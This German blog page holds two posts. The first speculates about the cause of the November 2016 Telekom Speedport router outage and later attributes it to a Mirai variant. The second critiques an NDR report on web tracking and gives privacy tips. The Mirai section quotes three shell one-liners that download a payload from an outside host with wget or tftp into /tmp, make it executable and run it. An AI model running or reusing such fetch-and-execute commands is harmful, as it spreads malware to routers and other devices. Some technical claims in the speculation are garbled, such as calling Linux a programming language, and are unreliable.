Cyberwar oder einfach nur technisches Versagen?

Share Button

OK, ich lehne mich mit meiner Ansicht über die massive Telekom- Störung vom 27. November 2016 ziemlich weit aus dem spekulativen Fenster. Bei dieser Störung handelt es sich um den Ausfall von etwa 900000 Internetanschlüssen von ausschließlich Telekom- Kunden.

Quelle: Telekom
Quelle: Telekom

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat sich zu einem gewagten Statement hinreißen lassen:

Das BSI ordnet diesen Ausfall einem weltweiten Angriff auf ausgewählte Fernverwaltungsports von DSL-Routern zu. Dieser erfolgte, um die angegriffenen Geräte mit Schadsoftware zu infizieren. Diese Angriffe wurden auch in dem vom BSI geschützten Regierungsnetz registriert, in dem sie aber auf Grund funktionierender Schutzmaßnahmen folgenlos blieben.

Ich glaube nicht, dass ein Hackerangriff für den Ausfall von Routermodellen ausschließlich des Typs Speedport und nur bei der Telekom verantwortlich ist/war.

Was spricht gegen diese Theorie, womit übrigens bereits kräftig politisch Kapital daraus geschlagen und gleichzeitig das technische Versagen der Telekom verschleiert wird?

1. Es existierte eine Störungsmeldung der Telekom bereits vor bzw. parallel zu der prominenteren, wo über 900000 Kunden betroffen sind/waren. Die Störmeldung lautet wörtlich:

„Automatische Routerkonfiguration funktioniert teilweise nicht“.

Quelle: Telekom
Quelle: Telekom

Es wurde also versucht, automatisch Änderungen an der Konfiguration vorzunehmen, wie das z.B. bei Firmware- Updates üblich ist, wenn der Kunde den Zugang hierfür auf seinem Router geöffnet hat. Das muss jetzt nichts mit der Folgestörung zu tun haben, wäre aber plausibel für den Fall, dass die neu eingespielte Firmware fehlerhaft gewesen sein sollte.

2. Angenommen, es wäre tatsächlich ein Cyber- Angriff auf jene Speedport- Routermodelle mit einer entsprechenden Sicherheitslücke der Grund für die massenhaften Ausfälle, wäre das aus Sicht der Angreifer doch eher sinnlos. Cyber- Kriminelle würden sich ja selbst das eigene Ziel für ihre Aktionen versperren, indem sie diese Internetanschlüsse quasi abschalten. Das ergibt eigentlich keinen Sinn.

3. Die von der Telekom eingeleiteten Maßnahmen zur Problemlösung in Form eines Konfigurationsupgrades deuten eher darauf hin, dass ein typischer Konfigurationsfehler behoben werden soll, als dass eine augenscheinlich bekannte Sicherheitslücke geschlossen werden soll. Würde nur eine Sicherheitslücke geschlossen werden, würde man damit nicht unbedingt auch wieder die Internetverbindung herstellen.

4. Schaut man sich die Kommentare diverser betroffener Telekom- Kunden an, so konnten viele das Problem lösen, indem sie ihre Endgeräte manuell auf einen anderen DNS- Server eingestellt haben (z.B. 8.8.8.8 von Google). Da diese Leute danach erfolgreich das Internet über den angeblich manipulierten Router und dessen womöglich fehlerhafter DNS- Konfiguration nutzen konnten, ist das ein erhebliches Indiz dafür, dass schlicht ein Konfigurationsfehler im Router zu bemängeln wäre. Das könnte z.B. spekulativ, aber plausibel darauf zurückzuführen sein, dass ein automatisches Router- Update fehl schlug und dabei eine falsche Adresse des Telekom- DNS- Servers eingetragen wurde. Dieser Lösungsansatz, der ja auch nachweislich bei vielen Leuten funktionierte, würde die Theorie eines Cyber- Angriffs deutlich schwächen.

5. In der Telekom- Störungsmeldung wird außerdem berichtet, dass man den Hersteller des Routers in die Fehlerbeseitigung involviert hat. Wären Modelle anderer Hersteller ebenfalls betroffen, hätte man nicht von einem Hersteller (im Singular) gesprochen, was man bei solchen Cyber- Angriffen durchaus erwarten müsste. Durch die bisher allerdings spärlich vorhandenen Informationen deutet alles eher darauf hin, dass die besagten Routermodelle womöglich lapidar durch ein automatisches Update lahm gelegt wurden. Die Zahl von etwa 900000 betroffenen Geräten deutet wiederum darauf hin, dass zwar viele Anschlüsse betroffen waren, aber lange nicht alle, die diese Routermodelle verwenden. Das kann eventuell damit zu erklären sein, dass eben nicht alle Router für ein automatisches Upgrade freigeschaltet waren/sind. Da müsste man jetzt Feedback von Telekom- Kunden bekommen, die mit den gleichen Routermodellen eben nicht vom Ausfall betroffen gewesen sind und ob tatsächlich die automatische Updatefunktion abgeschaltet ist. (Immerhin einen solchen Telekom- Kunden kenne ich persönlich.)

6. Befasst man sich mit der vom BSI propagierten Sicherheitslücke näher, klingt deren Schlussfolgerung keineswegs plausibel. Man sieht das TR-069 Protokoll, welches für Fernwartungszwecke für Kunden- Router eingesetzt wird, als potentielle Sicherheitslücke und auch im aktuellen Fall verantwortlich für die massenhaften Ausfälle. Die Kommunikation erfolgt über den Port 7547, was aber nicht zwingend sein muss.

Hierzu existiert ein offizielles Statement der Telekom auf eine entsprechende Kundenanfrage aus dem Jahr 2014, als die Sicherheitslücke des TR-069 Protokolls publiziert wurde:https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

Quelle: https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

 

Genau genommen müssten die Hacker demnach eher die Management- Server der entsprechenden Provider angreifen, um tatsächlich Zugriff auf betroffenen Router zu erlangen. Der Aufwand in Bezug auf den zu erwartenden Nutzen wäre gering.  Es ist nicht ungewöhnlich, dass im Internet Ports gescannt werden und der Port 7547 (TR-069 bzw. TR-064) bildet keine ungewöhnliche Ausnahme. Der Angreifer müsste sich nach dieser These einen Remote- Zugang auf einen schwach geschützten Kunden- Router verschaffen, um dann wiederum eine Kommunikation zum Provider- Management- Server herstellen zu können. Dann müsste der Angreifer schließlich noch die Sicherheitshürden des entsprechenden Management- Servers überwinden, um schließlich Zugriff auf alle Kunden- Router, die die Fernwartungsschnittstelle geöffnet haben, zugreifen zu können. Das wäre unter Umständen mit viel Aufwand und Glück möglich, würde aber absolut keinen Sinn ergeben, indem man nach diesem Aufwand einfach nur die Kunden- Router vom Netz trennt und damit auch den eigenen Zugriff darauf unterbindet.

7. Und schließlich wäre es allein aus Analysezwecken interessant und wichtig gewesen, an betroffenen Anschlüssen mal andere Routermodelle zu verwenden, ob dadurch der Fehler hätte behoben werden können. Darüber schweigt man sich aus, denn es würde nachweisen, dass der Cyber- Angriff erfunden wäre. Andere Routermodelle verwenden ebenfalls jene Fernwartungsschnittstelle. Wieso waren absolut keine anderen Router als jene Speedport- Modelle betroffen?

Wie dem auch sei, mir kommt als jemand, der sich ein wenig mit IT- Technik auskennt, diese Geschichte ziemlich suspekt vor.

Zwischenzeitlich verbreitet sich die Nachricht, dass tatsächlich eine schlecht programmierte Malware gezielt DSL- Router mit der inzwischen als verantwortlich erklärten Sicherheitslücke für die Ausfälle zuständig gewesen sein soll.

Würde sich nur ein einziger Telekom- Kunde melden, dessen Speedport- Router nicht jene Easy- Support Funktion eingeschaltet hatte und auch nicht betroffen gewesen wäre, würde die Telekom in Erklärungsnot geraten. Denn betroffene Telekom- Kunden, die durch Änderung des DNS- Server- Eintrages im Router das Problem selbst lösen konnten, mussten ja hingegen vom Zugriff von außen schließlich betroffen gewesen sein. Wenn also beide Fälle nachzuweisen wären, wäre die Cyber- Attacke als Erklärung recht dürftig.

Update 29.11.2016

 

telekom_stoerung4atelekom_stoerung4btelekom_stoerung4ctelekom_stoerung4d

 

 

 

 

 

 

 

 

Für den Fall, dass doch tatsächlich ein Hacker- Angriff der Auslöser für diese Großstörung der Telekom gewesen sein sollte, muss man der Telekom grobe Fahrlässigkeit unterstellen.

Wie erwähnt, hat man die Telekom bereits 2014 auf diese mögliche Schwachstelle hingewiesen. Jedoch hat die Telekom diesen Hinweis nicht ernst genommen bzw. sogar ignoriert. Es wurde versichert, dass nur der Telekom- Server Zugriff per „Easy Support“ herstellen könnte…

Ein Auszug aus dem Code des berüchtigten Mirai- Virus:

cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh

`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`

`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`

Grob gefasst, wird an das Gerät über einen Port, der nach außen, also in Richtung Internet, offen sein muss, eine entsprechende Anfrage gestellt. Das soll über den Port 7547 geschehen sein, der augenscheinlich für die Fernwartung von Seiten der Telekom für Speedport- Router standardmäßig geöffnet ist.

Das genügt jedoch nicht, um Befehle auszuführen. Hierfür muss natürlich vorher eine Authentifizierung erfolgen, ob die Remote- Anfrage auch berechtigt ist, Zugriff zu erhalten. Das scheint ja immerhin bei 900000 Routern der Telekom dann mit Erfolg praktiziert worden zu sein. Das Virus bedient sich dabei einem recht simplen Verfahren, indem es einfach der Reihe nach typische Standardpasswörter probiert. Danach können dann Befehle ausgeführt werden, die wie oben Daten nachladen, Berechtigungen von Dateien ändern usw.

Demnach wäre auch die Aussage auf die Frage im Jahr 2014 falsch, dass ausschließlich eine Verbindung zu einem Management- Server der Telekom über das TR-069 Protokoll möglich wäre.

Update 30.11.2016:

Die Anzeichen für einen Cyber- Angriff haben sich verdichtet. IT- Experten, allerdings nicht von der Telekom, haben den Angriff analysiert. Demnach war es kein gezielter Angriff durch russische Cyber- Soldaten, wie es zwischenzeitlich in den Medien propagiert wurde, sondern eben die übliche Prozedur von Internet- Kriminellen, welche Schwachstellen in der IoT- Umgebung (Internet of Things) permanent absuchen.

Die leider nicht geschlossenen Sicherheitslücken waren schließlich ausschlaggebend für das erfolgreiche Infizieren der Malware, welche wohl ein Derivat des berüchtigten Mirai- Virus war.

Die Speedport- Router waren auch nicht abgestürzt, sondern nur funktional eingeschränkt, da ja einige Telekom- Kunden durch das Ändern der DNS- Einträge auf den Endgeräten den Router immerhin noch als DSL- Modem verwenden konnten.

Die Aussagen von Seiten der Telekom bzw. des BSI, dass die Malware schlecht programmiert gewesen sein soll und dadurch nicht das eigentliche Ziel erreichte, sind falsch. Tatsächlich konnte die Malware nicht die Router- Software manipulieren, weil die Betriebssystem- Routinen nicht kompatibel mit der Programmiersprache (Linux) der Malware waren. Das deutet darauf hin, dass es definitiv kein gezielter Cyber- Angriff auf die Telekom- Infrastruktur gewesen sein kann.

Share Button

Nackt im Netz – Die Analyse zur NDR Sendung

Share Button

Der Panorama- Beitrag des NDR, Nackt im Netz, hat richtigerweise bei einigen Internetnutzern für  Sorgenfalten gesorgt. Dennoch denke ich, dass der Beitrag auch Defizite besitzt. Das möchte ich hiermit ergänzen:

Insbesondere haben die Autoren sich bei der Erhebung jener Daten auf Browser- Erweiterungen wie das erwähnte „WoT“ (Web of Trust) fixiert. Dabei sind es oft solche Browser- Erweiterungen, die den Schutz vor Ausspähung etwas minimieren können. Aufgrund einiger schwarzer Schafe unter den sogenannten AddOns halte ich es eher für kontraproduktiv, diese oft nützlichen Erweiterungen pauschal zu dämonisieren. Solche Programme wie „Ghostery“ erwirken durchaus eine höhere Privatsphäre. Die Browser selbst sind ebenfalls unterschiedlich geschwätzig und von Google’s Chrome ist definitiv abzuraten, wohingegen Mozilla Firefox oder dessen Modifikation Cliqz vorzuziehen wären.

Tatsächlich ist es gar nicht nötig, dass Browser- Erweiterungen für das Sammeln jener Daten eingesetzt werden, da der Anwender allein durch das Nutzen von Suchmaschinen wie Google diese Daten bereits ohne Zusatzprogramme aushändigt. Im Beitrag war das auch kurzzeitig zu sehen, wenn auch nicht explizit darauf eingegangen wurde. Der Browser selbst liefert diese Daten aus, was in manchen Fällen sogar unumgänglich für das Funktionieren zwischen Client (PC, Smartphone) und Server ist. Ein gewisses „Handshake“ zwischen den kommunizierenden technischen Systemen muss schlicht stattfinden. Man kann es aber auf ein Minimum reduzieren.

Indem man z.B. anstatt Google als Suchmaschine eine datenfreundliche Alternative wie „Startpage.com“ verwendet, reduziert man die Auslieferung von spezifischen Daten ungemein.

Ist man Nutzer von sozialen Netzwerken wie Facebook, sollte man sich jedes Mal nach der Nutzung richtig abmelden. Denn ansonsten kann Facebook aufgrund der bekannten Identität des Nutzers sogar Daten sammeln, wenn dieser sich anderswo in der virtuellen Welt bewegt. Man kann sich das so vorstellen, als würde man einen Hund an einen Baum mit einer quasi unendlich langen Leine anbinden. Wie ein GPS- Signal sendet das Gerät des Facebook- Benutzers, der sich nicht vom Dienst abgemeldet hat, den Standort und den Namen der jeweiligen Internetpräsenz an Facebook zurück.

Dass man, wo immer es möglich ist, nicht unbedingt seinen Klarnamen angeben und mit Auskünften über die eigene Person sparen sollte, wäre ebenfalls eine recht simple Möglichkeit, die eigenen Datenspuren zumindest teilweise zu verwischen. Verschlüsselung und Proxy- Nutzung runden ein schon ziemlich schlüssiges Sicherheitskonzept ab. Stichwort „Tor„.

Extrem wichtig ist auch das Unterbinden von sogenannten Trackern. Damit bezeichnet man kleine Code- Snippets, die in die Quellcodes von Internetseiten eingebaut werden. Sie dienen hauptsächlich dem Zweck, die Besucher sekundär zu analysieren und auszuwerten, indem alle möglichen Daten, die zwangsläufig zwischen Start- und Zielsystem ausgetauscht werden, primär gesammelt werden. Ich habe mir einmal die Mühe gemacht und habe einige „renommierte“ deutsche Internetpräsenzen danach untersucht, wie viele solcher Tracker dort ohne Einwilligung der Besucher deren Daten einsammeln (unvollständige Beispielliste):

trackerliste

 

Man könnte die Liste beliebig fortsetzen und in den meisten Fällen auch mehr oder weniger Tracker finden. Nun sind nicht alle Tracker gleichermaßen für die Privatsphäre gefährlich, dennoch wäre es die moralische Verpflichtung der Betreiber, mindestens die Besucher auf diese Datenerfassung hinzuweisen, natürlich bevor die Tracker aktiv werden. In der aktuellen Situation hat kein Anwender eine Chance, sich dagegen zu wehren, bestenfalls mit Anti- Tracker Programmen. Da klingt es beinahe schon schizophren, dass aktuell Branchen- Lobbyisten per Gesetz den Einsatz von sogenannten Ad- Blockern verbieten lassen wollen…

Der NDR setzt beispielsweise den Tracker „InfOnline“ ein, der das Besucheraufkommen messen soll. Es ist eine nutzbringende und strategische Information von Internetseitenbetreibern, bietet aber schon grundlegende Informationen zur Profilbildung. Der nächste Tracker „NetRatings SiteCensus“ besitzt schon eine andere Qualität. Auf der Internetpräsenz dieses Anbieters wird unverhohlen mit Marketing- Strategien aufgrund der gesammelten Daten geworben. Der 3. Tracker im Portfolio des NDR nennt sich „Digital Analytix“. Ich überlasse es jedem selbst, zu recherchieren, welche Daten die einzelnen Tracker sammeln und analysieren. Im Prinzip kann der NDR das sogar bequem im eigenen Haus tun, da ja der Sender als Kunde dieser Unternehmen das Ergebnis kostenpflichtig erhält. Für eine öffentlich- rechtliche Sendeanstalt halte ich das Tracken von Besuchern Ihrer Internetpräsenz durchaus für fragwürdig.

Da gibt es auch solche Tracker wie „Amazon Associates“, die z.B. dafür sorgen, dass die Internetnutzer auch die passende personalisierte Werbung erhalten und sich wundern, woher der Internetkonzern weiß, dass man tatsächlich nach diesen Dingen im Internet gesucht hat.

T- Online offenbart übrigens zusätzlich dubiose Geschäftspraktiken mit Tracking. Denn Kunden des Unternehmens sind schließlich gezwungen, über die Einstiegsseiten des Konzerns in ihren Online- Kundenbereich zu gelangen und werden somit ständig analysiert.  Netzpolitik.org bildet fast schon eine einsame und zugleich vorbildliche Ausnahme im Bereich der Nachrichtenportale und lässt seine Besucher in Ruhe.

Man darf aber nicht unerwähnt lassen, dass es auch Tracker gibt, die auch nützlich sind. Da wäre beispielsweise „Hupso“ zu erwähnen, der den Komfort bietet, dass Webinhalte schnell und einfach auf anderen Plattformen verbreitet werden können. Dabei werden natürlich auch Daten gesammelt, aber der Benutzer kann selbst entscheiden, ob er diesen Komfort nutzen möchte.

Und um nicht das Internet vollkommen verdammen zu wollen, hätte ich da noch einen kleinen Tipp: Warum drehen die Internetnutzer den Spieß nicht einfach um? Wer die genannten Möglichkeiten voll oder teilweise ausschöpft, um seine Daten gegenüber den Datenkraken zu verschleiern, kann z.B. eine dieser Datenkraken und zwar Facebook nutzen, um zu überprüfen, wie gut die eigenen Schutzmechanismen wirken. Denn Facebook bietet lustiger Weise die Möglichkeit, nachzusehen, weshalb ausgerechnet jene Werbeeinblendung angezeigt wird. Je unpräziser die Auswahlkriterien sind, desto besser hat die eigene Verschleierung funktioniert. Im Grunde kann man Facebook- Werbeeinblendungen als Indikator für das eigene Datenschutzkonzept missbrauchen 😉

 

Share Button